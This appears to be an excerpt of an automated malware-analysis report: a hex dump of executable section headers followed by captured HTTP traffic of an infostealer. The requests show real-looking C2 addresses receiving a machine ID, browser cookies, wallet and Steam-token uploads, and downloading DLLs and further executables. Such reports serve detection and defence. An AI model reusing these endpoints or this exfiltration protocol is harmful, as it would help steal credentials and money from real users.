00 00 00 00 00 00 00 00 00 00 f0 9c 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 01 00 00 10 00 00 00 a4 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 80 00 00 00 c0 01 00 00 40 00 00 00 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 30 21 00 00 40 02 00 00 04 00 00 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 50 00 00 00 70 23 00 00 20 00 00 00 ec 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 79 00 00 c0 23 00 00 28 03 00 00 0c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 64 61 74 61 00 00 00 00 60 21 00 00 c0 9c 00 00 60 21 00 00 34 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDAAKJEGCFCAKEBKJJEHost: 85.28.47.4Content-Length: 214Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 44 41 41 4b 4a 45 47 43 46 43 41 4b 45 42 4b 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 36 30 43 39 36 36 38 33 39 32 37 32 30 32 39 37 34 31 31 31 39 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 41 41 4b 4a 45 47 43 46 43 41 4b 45 42 4b 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 41 41 4b 4a 45 47 43 46 43 41 4b 45 42 4b 4a 4a 45 2d 2d 0d 0a Data Ascii: ------GHDAAKJEGCFCAKEBKJJEContent-Disposition: form-data; name="hwid"660C966839272029741119------GHDAAKJEGCFCAKEBKJJEContent-Disposition: form-data; name="build"default------GHDAAKJEGCFCAKEBKJJE--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIIIIJKFCAAECAKFIEHCHost: 85.28.47.4Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 49 49 49 4a 4b 46 43 41 41 45 43 41 4b 46 49 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 35 64 66 39 66 62 63 37 38 38 65 38 39 37 61 62 30 37 33 61 63 62 35 33 30 31 61 39 38 33 66 35 36 30 37 64 38 64 63 65 36 66 34 30 66 63 64 39 36 34 36 39 63 61 32 63 62 37 35 64 63 61 30 66 65 35 36 32 32 62 31 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 49 49 4a 4b 46 43 41 41 45 43 41 4b 46 49 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 49 49 4a 4b 46 43 41 41 45 43 41 4b 46 49 45 48 43 2d 2d 0d 0a Data Ascii: ------FIIIIJKFCAAECAKFIEHCContent-Disposition: form-data; name="token"05df9fbc788e897ab073acb5301a983f5607d8dce6f40fcd96469ca2cb75dca0fe5622b1------FIIIIJKFCAAECAKFIEHCContent-Disposition: form-data; name="message"browsers------FIIIIJKFCAAECAKFIEHC--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDAAEHDHIIJKECBKEBAHost: 85.28.47.4Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 44 41 41 45 48 44 48 49 49 4a 4b 45 43 42 4b 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 35 64 66 39 66 62 63 37 38 38 65 38 39 37 61 62 30 37 33 61 63 62 35 33 30 31 61 39 38 33 66 35 36 30 37 64 38 64 63 65 36 66 34 30 66 63 64 39 36 34 36 39 63 61 32 63 62 37 35 64 63 61 30 66 65 35 36 32 32 62 31 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 45 48 44 48 49 49 4a 4b 45 43 42 4b 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 45 48 44 48 49 49 4a 4b 45 43 42 4b 45 42 41 2d 2d 0d 0a Data Ascii: ------BGDAAEHDHIIJKECBKEBAContent-Disposition: form-data; name="token"05df9fbc788e897ab073acb5301a983f5607d8dce6f40fcd96469ca2cb75dca0fe5622b1------BGDAAEHDHIIJKECBKEBAContent-Disposition: form-data; name="message"plugins------BGDAAEHDHIIJKECBKEBA--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFIDGDAKFHIEHJKFHDHDHost: 85.28.47.4Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 46 48 44 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 35 64 66 39 66 62 63 37 38 38 65 38 39 37 61 62 30 37 33 61 63 62 35 33 30 31 61 39 38 33 66 35 36 30 37 64 38 64 63 65 36 66 34 30 66 63 64 39 36 34 36 39 63 61 32 63 62 37 35 64 63 61 30 66 65 35 36 32 32 62 31 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 46 48 44 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 46 48 44 48 44 2d 2d 0d 0a Data Ascii: ------BFIDGDAKFHIEHJKFHDHDContent-Disposition: form-data; name="token"05df9fbc788e897ab073acb5301a983f5607d8dce6f40fcd96469ca2cb75dca0fe5622b1------BFIDGDAKFHIEHJKFHDHDContent-Disposition: form-data; name="message"fplugins------BFIDGDAKFHIEHJKFHDHD--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIJDAFBKFIECBGCAKECGHost: 85.28.47.4Content-Length: 5571Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/sqlite3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIIIIJKFCAAECAKFIEHCHost: 85.28.47.4Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 49 49 49 4a 4b 46 43 41 41 45 43 41 4b 46 49 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 35 64 66 39 66 62 63 37 38 38 65 38 39 37 61 62 30 37 33 61 63 62 35 33 30 31 61 39 38 33 66 35 36 30 37 64 38 64 63 65 36 66 34 30 66 63 64 39 36 34 36 39 63 61 32 63 62 37 35 64 63 61 30 66 65 35 36 32 32 62 31 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 49 49 4a 4b 46 43 41 41 45 43 41 4b 46 49 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 49 49 4a 4b 46 43 41 41 45 43 41 4b 46 49 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4d 54 45 32 4d 54 55 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 51 74 4d 54 4d 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 4d 77 4f 44 45 31 43 55 35 4a 52 41 6b 31 4d 54 45 39 52 57 59 31 64 6c 42 47 52 33 63 74 54 56 70 5a 62 7a 56 6f 64 32 55 74 4d 46 52 6f 51 56 5a 7a 62 47 4a 34 59 6d 31 32 5a 46 5a 61 64 32 4e 49 62 6e 46 57 65 6c 64 49 51 56 55 78 4e 48 59 31 4d 30 31 4f 4d 56 5a 32 64 33 5a 52 63 54 68 69 59 56 6c 6d 5a 7a 49 74 53 55 46 30 63 56 70 43 56 6a 56 4f 54 30 77 31 63 6e 5a 71 4d 6b 35 58 53 58 46 79 65 6a 4d 33 4e 31 56 6f 54 47 52 49 64 45 39 6e 52 53 31 30 53 6d 46 43 62 46 56 43 57 55 70 46 61 48 56 48 63 31 46 6b 63 57 35 70 4d 32 39 55 53 6d 63 77 59 6e 4a 78 64 6a 46 6b 61 6d 52 70 54 45 70 35 64 6c 52 54 56 57 68 6b 53 79 31 6a 4e 55 70 58 59 57 52 44 55 33 4e 56 54 46 42 4d 65 6d 68 54 65 43 31 47 4c 54 5a 33 54 32 63 30 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 49 49 4a 4b 46 43 41 41 45 43 41 4b 46 49 45 48 43 2d 2d 0d 0a Data Ascii: ------FIIIIJKFCAAECAKFIEHCContent-Disposition: form-data; name="token"05df9fbc788e897ab073acb5301a983f5607d8dce6f40fcd96469ca2cb75dca0fe5622b1------FIIIIJKFCAAECAKFIEHCContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------FIIIIJKFCAAECAKFIEHCContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwMTE2MTUJMVBfSkFSCTIwMjMtMTAtMDQtMTMKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjMwODE1CU5JRAk1MTE9RWY1dlBGR3ctTVpZbzVod2UtMFRoQVZzbGJ4Ym12Z
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKFHJEBAAEBGDGDBFBGHost: 85.28.47.4Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 46 48 4a 45 42 41 41 45 42 47 44 47 44 42 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 35 64 66 39 66 62 63 37 38 38 65 38 39 37 61 62 30 37 33 61 63 62 35 33 30 31 61 39 38 33 66 35 36 30 37 64 38 64 63 65 36 66 34 30 66 63 64 39 36 34 36 39 63 61 32 63 62 37 35 64 63 61 30 66 65 35 36 32 32 62 31 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 46 48 4a 45 42 41 41 45 42 47 44 47 44 42 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 46 48 4a 45 42 41 41 45 42 47 44 47 44 42 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 46 48 4a 45 42 41 41 45 42 47 44 47 44 42 46 42 47 2d 2d 0d 0a Data Ascii: ------DBKFHJEBAAEBGDGDBFBGContent-Disposition: form-data; name="token"05df9fbc788e897ab073acb5301a983f5607d8dce6f40fcd96469ca2cb75dca0fe5622b1------DBKFHJEBAAEBGDGDBFBGContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------DBKFHJEBAAEBGDGDBFBGContent-Disposition: form-data; name="file"------DBKFHJEBAAEBGDGDBFBG--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEGHJDGIJECGDHJJECGHHost: 85.28.47.4Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 47 48 4a 44 47 49 4a 45 43 47 44 48 4a 4a 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 35 64 66 39 66 62 63 37 38 38 65 38 39 37 61 62 30 37 33 61 63 62 35 33 30 31 61 39 38 33 66 35 36 30 37 64 38 64 63 65 36 66 34 30 66 63 64 39 36 34 36 39 63 61 32 63 62 37 35 64 63 61 30 66 65 35 36 32 32 62 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 48 4a 44 47 49 4a 45 43 47 44 48 4a 4a 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 48 4a 44 47 49 4a 45 43 47 44 48 4a 4a 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 48 4a 44 47 49 4a 45 43 47 44 48 4a 4a 45 43 47 48 2d 2d 0d 0a Data Ascii: ------JEGHJDGIJECGDHJJECGHContent-Disposition: form-data; name="token"05df9fbc788e897ab073acb5301a983f5607d8dce6f40fcd96469ca2cb75dca0fe5622b1------JEGHJDGIJECGDHJJECGHContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------JEGHJDGIJECGDHJJECGHContent-Disposition: form-data; name="file"------JEGHJDGIJECGDHJJECGH--
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/freebl3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/mozglue.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/msvcp140.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/nss3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/softokn3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/vcruntime140.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKJDGCGDAAAKECAKKJDAHost: 85.28.47.4Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAFIEGIECGCBKFIEBGCAHost: 85.28.47.4Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 46 49 45 47 49 45 43 47 43 42 4b 46 49 45 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 35 64 66 39 66 62 63 37 38 38 65 38 39 37 61 62 30 37 33 61 63 62 35 33 30 31 61 39 38 33 66 35 36 30 37 64 38 64 63 65 36 66 34 30 66 63 64 39 36 34 36 39 63 61 32 63 62 37 35 64 63 61 30 66 65 35 36 32 32 62 31 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 49 45 47 49 45 43 47 43 42 4b 46 49 45 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 49 45 47 49 45 43 47 43 42 4b 46 49 45 42 47 43 41 2d 2d 0d 0a Data Ascii: ------BAFIEGIECGCBKFIEBGCAContent-Disposition: form-data; name="token"05df9fbc788e897ab073acb5301a983f5607d8dce6f40fcd96469ca2cb75dca0fe5622b1------BAFIEGIECGCBKFIEBGCAContent-Disposition: form-data; name="message"wallets------BAFIEGIECGCBKFIEBGCA--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHDHJJJECFIECBGDGCAAHost: 85.28.47.4Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 44 48 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 35 64 66 39 66 62 63 37 38 38 65 38 39 37 61 62 30 37 33 61 63 62 35 33 30 31 61 39 38 33 66 35 36 30 37 64 38 64 63 65 36 66 34 30 66 63 64 39 36 34 36 39 63 61 32 63 62 37 35 64 63 61 30 66 65 35 36 32 32 62 31 0d 0a 2d 2d 2d 2d 2d 2d 44 48 44 48 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 44 48 44 48 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 2d 2d 0d 0a Data Ascii: ------DHDHJJJECFIECBGDGCAAContent-Disposition: form-data; name="token"05df9fbc788e897ab073acb5301a983f5607d8dce6f40fcd96469ca2cb75dca0fe5622b1------DHDHJJJECFIECBGDGCAAContent-Disposition: form-data; name="message"files------DHDHJJJECFIECBGDGCAA--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGDGCGCFHIEHIDGDBAAEHost: 85.28.47.4Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 44 47 43 47 43 46 48 49 45 48 49 44 47 44 42 41 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 35 64 66 39 66 62 63 37 38 38 65 38 39 37 61 62 30 37 33 61 63 62 35 33 30 31 61 39 38 33 66 35 36 30 37 64 38 64 63 65 36 66 34 30 66 63 64 39 36 34 36 39 63 61 32 63 62 37 35 64 63 61 30 66 65 35 36 32 32 62 31 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 47 43 47 43 46 48 49 45 48 49 44 47 44 42 41 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 47 43 47 43 46 48 49 45 48 49 44 47 44 42 41 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 47 43 47 43 46 48 49 45 48 49 44 47 44 42 41 41 45 2d 2d 0d 0a Data Ascii: ------EGDGCGCFHIEHIDGDBAAEContent-Disposition: form-data; name="token"05df9fbc788e897ab073acb5301a983f5607d8dce6f40fcd96469ca2cb75dca0fe5622b1------EGDGCGCFHIEHIDGDBAAEContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------EGDGCGCFHIEHIDGDBAAEContent-Disposition: form-data; name="file"------EGDGCGCFHIEHIDGDBAAE--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDHIEGIIIECAKEBFBAAHost: 85.28.47.4Content-Length: 270Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 35 64 66 39 66 62 63 37 38 38 65 38 39 37 61 62 30 37 33 61 63 62 35 33 30 31 61 39 38 33 66 35 36 30 37 64 38 64 63 65 36 66 34 30 66 63 64 39 36 34 36 39 63 61 32 63 62 37 35 64 63 61 30 66 65 35 36 32 32 62 31 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 6a 62 64 74 61 69 6a 6f 76 67 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 41 2d 2d 0d 0a Data Ascii: ------HIDHIEGIIIECAKEBFBAAContent-Disposition: form-data; name="token"05df9fbc788e897ab073acb5301a983f5607d8dce6f40fcd96469ca2cb75dca0fe5622b1------HIDHIEGIIIECAKEBFBAAContent-Disposition: form-data; name="message"jbdtaijovg------HIDHIEGIIIECAKEBFBAA--
Source: global traffic HTTP traffic detected: GET /mine/amadka.exe HTTP/1.1Host: 77.91.77.81Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: GET /stealc/random.exe HTTP/1.1Host: 77.91.77.81
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 30 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000006001&unit=246122658369
